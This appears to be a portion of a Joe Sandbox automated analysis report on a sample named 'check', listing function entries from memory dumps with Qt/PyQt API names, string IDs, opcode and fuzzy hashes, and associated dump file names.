                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?naturalDoubleFloat_FromLine@@Width@
                                                                                                                                                                                                                                          • String ID: QTextLine$naturalTextWidth$naturalTextWidth(self) -> float
                                                                                                                                                                                                                                          • API String ID: 455575366-3365953317
                                                                                                                                                                                                                                          • Opcode ID: 773e9792d820266d1748fa40e7cb877922f96a4a8a454bc182a22be4003b03b8
                                                                                                                                                                                                                                          • Instruction ID: 62f32df2e6b3d69ea5a6674f0a960efdbcee1680d44b5218d75166b75487249d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 773e9792d820266d1748fa40e7cb877922f96a4a8a454bc182a22be4003b03b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D501EC36A08E46D5EB109F61E8496A933A4FB44FD4F914032DA9E47320EF7DF69AC344
                                                                                                                                                                                                                                          Function 00007FF89D973F30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?dashDoubleFloat_FromOffset@Pen@@
                                                                                                                                                                                                                                          • String ID: QPen$dashOffset$dashOffset(self) -> float
                                                                                                                                                                                                                                          • API String ID: 1815483110-664962406
                                                                                                                                                                                                                                          • Opcode ID: 86499e9bba0c4ed648148fd48ae9e774b92d88f4eeb73ba31b039138d095e21b
                                                                                                                                                                                                                                          • Instruction ID: 430ad16e405a70182effbe9aed0fc1548e25dab689ca535a976687b35e66265c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86499e9bba0c4ed648148fd48ae9e774b92d88f4eeb73ba31b039138d095e21b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F012136A08B46C1EB109F51E8496A933A4FB40FD4F914032D99E07330EF7CE65AC384
                                                                                                                                                                                                                                          Function 00007FF712519368 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                          • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction ID: 6cd900eea8c9c0958a777e5466238cdc2cb603c066f16d74dbd2e8e991d731ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD118222F6CE0301FA643965E4D237D9070BF59370FC806B4EA6E172D68EEC684EC121
                                                                                                                                                                                                                                          Function 00007FF71250B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B3AF
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B3CE
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B3F6
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B407
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B418
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                          • Instruction ID: dc7a55f717b2a8568f3d506291374d109cfee97a9748e077d973c59abc632cd1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67117220F08E0281F958BF265DD1579E1425F547B0FD843B4D97E466C6FDACB509C324
                                                                                                                                                                                                                                          Function 00007FF89D9CFAB0 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: List_$Size$ItemLongLong_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1144519416-0
                                                                                                                                                                                                                                          • Opcode ID: 87c7589c3d866cc5d2d0eb5da0fb8451543ff253408e77ed3a235263022f7c2c
                                                                                                                                                                                                                                          • Instruction ID: 4d8b3f27f228db2abce7426da8eaaf295192384491d8047e3ffaa54e31f29af7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87c7589c3d866cc5d2d0eb5da0fb8451543ff253408e77ed3a235263022f7c2c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3018E22B0A64182EA649F65B9552396390AB45FE0F845230EAAF47B94EF7CF0568308
                                                                                                                                                                                                                                          Function 00007FF71250FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                          • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                          • Instruction ID: a1f6f64578c3d196d9c62492bc27b93304a4d321c4e7acbd6990fec3e152a8b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7581C473D0CA0387F7657F2599D0278B6A0AB11B64FD540B5CA0D97285EFACE80AD339
                                                                                                                                                                                                                                          Function 00007FF89D9C9DE0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Pixmap@@$?drawEngine@@F@@@PaintPixmap@PointRectTiledV0@@
                                                                                                                                                                                                                                          • String ID: NNN$drawTiledPixmap
                                                                                                                                                                                                                                          • API String ID: 245502091-3720221948
                                                                                                                                                                                                                                          • Opcode ID: 9faed997e513f28e10e05add6e84ed866baaedcca9dd1c7a4b6e2d2c0b1d922c
                                                                                                                                                                                                                                          • Instruction ID: 9f9d4cb23e651a72cd37be199ef6b77d127fa5cd96e9690a0044492f4867dc47
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9faed997e513f28e10e05add6e84ed866baaedcca9dd1c7a4b6e2d2c0b1d922c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76411823A09B8586E7618B15F8017AAB3A4FB98BC4F444235DECD17765EF3CE0A5D704
                                                                                                                                                                                                                                          Function 00007FF89D933D90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??0QDoubleValidator@@QEAA@PEAVQObject@@@Z.QT5GUI ref: 00007FF89D933E23
                                                                                                                                                                                                                                          • ??0QDoubleValidator@@QEAA@NNHPEAVQObject@@@Z.QT5GUI ref: 00007FF89D933EED
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleObject@@@Validator@@$malloc
                                                                                                                                                                                                                                          • String ID: ddi|JH$|JH
                                                                                                                                                                                                                                          • API String ID: 1549773057-403693801
                                                                                                                                                                                                                                          • Opcode ID: ba7b633dccbe7817b880e2332ae92c600f49a849b9eaed363084f56f822b1c02
                                                                                                                                                                                                                                          • Instruction ID: 428b6f141812cddf9e6a27e10a485a9d922a999c572b90a739a16d2d559396cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba7b633dccbe7817b880e2332ae92c600f49a849b9eaed363084f56f822b1c02
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F41D237608B8185DB608F12E84469AB3A8FB48BD0F554136EACE47B28EF3DE555C744
                                                                                                                                                                                                                                          Function 00007FF89D9CBD10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?headerData@ItemModel@@Orientation@Qt@@Standard
                                                                                                                                                                                                                                          • String ID: headerData$iFi
                                                                                                                                                                                                                                          • API String ID: 4080222492-2305688570
                                                                                                                                                                                                                                          • Opcode ID: ee2094dcb450bf19ebb0fd0d8320244bed4a64bc93ce194b3a99d892fbc7f532
                                                                                                                                                                                                                                          • Instruction ID: 3bc560027eec479776a9ff2f899d280da82efc7cd6a02781cd82d8c06a8496b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee2094dcb450bf19ebb0fd0d8320244bed4a64bc93ce194b3a99d892fbc7f532
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E31F677608B8186EB208F16F84096977A4F798FD4F544136EE8E53724EF3CE5558B08
                                                                                                                                                                                                                                          Function 00007FF89D94DF20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 61COMMON
